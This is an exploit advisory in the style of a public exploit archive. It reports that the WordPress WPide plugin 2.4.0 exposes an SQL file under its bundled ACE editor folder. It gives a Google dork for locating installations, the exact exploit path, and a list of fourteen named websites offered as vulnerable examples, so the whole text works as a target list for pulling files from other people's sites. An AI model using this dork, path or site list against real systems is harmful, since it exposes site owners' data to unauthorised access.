WordPress WPide ACE-0.2.0 plugin version 2.4.0 suffers from a database disclosure vulnerability.
b042037147af9b7b0d48189c3c492457#################################################################################################
# Exploit Title : WordPress WPide ACE-0.2.0 Plugin 2.4.0 Database Backup
Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 08/12/2018
# Vendor Homepage : wordpress.org/plugins/wpide/ ~
pluginarchive.com/wordpress/wpide
# Software Download Link : downloads.wordpress.org/plugin/wpide.2.4.0.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.4.0
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/wpide/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql
#################################################################################################
# Example Vulnerable Sites =>
[+]
mnsuam.edu.pk/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql
[+]
cloudsense.com/cswpblog/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql
[+]
silverstitch.ca/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql
[+]
alcoholandyouni.com/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql
[+]
wallerpollins.com/aspt-event/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql
[+] bluet.me/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql
[+]
blog.donedeal.ie/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql
[+]
cipriandumitrescu.com/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql
[+] js.com/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql
[+] tesolau.com/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql
[+]
gastonbrowne.com/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql
[+]
imedenver.com/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql
[+]
videos.saltandlightcouncil.org/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql
[+]
holografi.co/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################